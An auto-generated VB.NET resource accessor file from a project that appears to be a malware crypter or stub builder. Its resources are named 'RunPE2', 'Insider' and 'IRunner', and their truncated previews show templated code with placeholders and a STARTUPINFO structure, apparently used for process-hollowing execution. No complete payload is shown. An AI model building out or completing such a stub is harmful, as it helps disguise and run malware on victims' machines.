'------------------------------------------------------------------------------
' <auto-generated>
'     This code was generated by a tool.
'     Runtime Version:4.0.30319.1
'
'     Changes to this file may cause incorrect behavior and will be lost if
'     the code is regenerated.
' </auto-generated>
'------------------------------------------------------------------------------

Option Strict On
Option Explicit On

Imports System

Namespace My.Resources
    
    'This class was auto-generated by the StronglyTypedResourceBuilder
    'class via a tool like ResGen or Visual Studio.
    'To add or remove a member, edit your .ResX file then rerun ResGen
    'with the /str option, or rebuild your VS project.
    '''<summary>
    '''  A strongly-typed resource class, for looking up localized strings, etc.
    '''</summary>
    <Global.System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0"),  _
     Global.System.Diagnostics.DebuggerNonUserCodeAttribute(),  _
     Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(),  _
     Global.Microsoft.VisualBasic.HideModuleNameAttribute()>  _
    Friend Module Resources
        
        Private resourceMan As Global.System.Resources.ResourceManager
        
        Private resourceCulture As Global.System.Globalization.CultureInfo
        
        '''<summary>
        '''  Returns the cached ResourceManager instance used by this class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager
            Get
                If Object.ReferenceEquals(resourceMan, Nothing) Then
                    Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("WindowsApplication1.Resources", GetType(Resources).Assembly)
                    resourceMan = temp
                End If
                Return resourceMan
            End Get
        End Property
        
        '''<summary>
        '''  Overrides the current thread's CurrentUICulture property for all
        '''  resource lookups using this strongly typed resource class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend Property Culture() As Global.System.Globalization.CultureInfo
            Get
                Return resourceCulture
            End Get
            Set
                resourceCulture = value
            End Set
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Class %DD%
        '''    &lt;StructLayout(LayoutKind.Sequential, CharSet:=CharSet.Unicode)&gt; _
        '''Structure STARTUPINFO
        '''        Public cb As Integer
        '''        Public lpReserved As String
        '''        Public lpDesktop As String
        '''        Public lpTitle As String
        '''        Public dwX As Integer
        '''        Public dwY As Integer
        '''        Public dwXSize As Integer
        '''        Public dwYSize As Integer
        '''        Public dwXCountChars As Integer
        '''        Public dwYCountChars As Integer
        '''        Public dwFillAttribute As Integer
        '''        Publ [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property Insider() As String
            Get
                Return ResourceManager.GetString("Insider", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to 
        '''Dim %path2% As String = &quot;{PATH}&quot;
        '''%DD%.%SRexec%(ext, %path2%, True)
        '''
        '''.
        '''</summary>
        Friend ReadOnly Property IRunner() As String
            Get
                Return ResourceManager.GetString("IRunner", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .
        '''</summary>
        Friend ReadOnly Property RunPE2() As String
            Get
                Return ResourceManager.GetString("RunPE2", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Imports Microsoft.VisualBasic.Strings
        '''Imports System.Threading
        '''Imports System.Reflection
        '''Imports System.Windows.Forms
        '''Imports System.Runtime.InteropServices
        '''Imports System.IO
        '''Imports System.Runtime.CompilerServices
        '''Imports System.Collections.Generic
        '''Imports System
        '''Imports System.Resources
        '''Imports System.Net.WebClient
        '''Imports System.Text
        '''Imports System.Diagnostics
        '''Imports System.IO.File
        '''Imports Microsoft.Win32
        '''Imports System.Security.Cryptography
        '''Imports Microsoft.VisualBasic
        '''Imports System. [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property Source() As String
            Get
                Return ResourceManager.GetString("Source", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .
        '''</summary>
        Friend ReadOnly Property Wait() As String
            Get
                Return ResourceManager.GetString("Wait", resourceCulture)
            End Get
        End Property
    End Module
End Namespace
